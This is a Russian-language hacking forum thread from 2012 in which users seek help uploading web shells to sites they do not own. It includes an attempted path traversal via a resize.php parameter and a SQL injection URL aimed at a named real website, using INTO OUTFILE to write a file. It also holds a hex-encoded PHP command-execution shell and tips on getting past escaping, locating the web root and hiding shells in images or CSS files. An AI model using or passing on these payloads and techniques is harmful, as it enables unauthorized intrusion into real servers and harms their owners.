 |
|
28.03.2012, 14:08
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от nikaw87
Вопрос такой... Имеется файл который отвечает за вывод картинки, /resize.php?act=gif&image=../../ххх/хх/34.png , из него что то дельное можно выжать? или бесполезно? таким образом только картинки вытягивает...
Название скрипта подозрительное. Думаю кроме раскрытия путей ничего не получишь.
OxoTnik,
я не думаю, что картинки инклудят.
|
|
|
28.03.2012, 14:13
|
|
Новичок
Регистрация: 14.07.2011
Сообщений: 5
С нами:
7805846
Репутация:
0
|
|
Сообщение от OxoTnik
Заливаешь картинку с шелом, и таким же образом вытягиваешь, если чё нул байт
Заливал... также тянул-просто черное изображение( жаль...
|
|
|
|
28.03.2012, 14:20
|
|
Новичок
Регистрация: 14.07.2011
Сообщений: 5
С нами:
7805846
Репутация:
0
|
|
Говорю же- только картинки... пробовал достать банально robots.txt, ноль эффекта... решил спросить, может обходные пути есть
|
|
|
|
28.03.2012, 18:28
|
|
Познающий
Регистрация: 12.03.2012
Сообщений: 40
С нами:
7457366
Репутация:
0
|
|
Помогите залить шелл,пробовал так,не получаутся
http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'',5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+mysql.user+into+outfile+ '/var/www/html/PHPscripts/a.html'--
|
|
|
|
28.03.2012, 18:48
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
С нами:
9384053
Репутация:
303
|
|
Сообщение от Facecontrol
Помогите залить шелл,пробовал так,не получаутся
http://www.hsplusdesign.be/itemviewer.php?id=-39+UNION+SELECT+1,2,3,'',5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21+from+mysql.user+into+outfile+ '/var/www/html/PHPscripts/a.html'--
А так и не получится. Ибо или magic_quotes On либо слеширование вида use near '\'test\',5,6,7. Как минимум ищите скрипты где не происходит слеширование (используются не GPC массивы и тп) и поиск phpmyadmin
PS. Прежде чем делать что-либо , потрудитесь изучить теорию хотябы в минимуме. Изза слеширования вставляются доп символы в sql запрос и он становится некорректным
|
|
|
|
28.03.2012, 20:01
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
попробуй перевести в HEX
получится так
Код:
0x3c3f2073797374656d28245f4745545b636d645d293b203f3e
хотя не получится |
|
|
|
28.03.2012, 20:58
|
|
Новичок
Регистрация: 03.12.2011
Сообщений: 0
С нами:
7601366
Репутация:
0
|
|
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
|
|
|
|
28.03.2012, 21:08
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
здесь экстрасенсов нету,сылку в студию
|
|
|
|
28.03.2012, 21:14
|
|
Познающий
Регистрация: 12.03.2012
Сообщений: 40
С нами:
7457366
Репутация:
0
|
|
А можно ли через файл.css залить шелл?
|
|
|
|
28.03.2012, 21:17
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Facecontrol
А можно ли через файл.css залить шелл?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
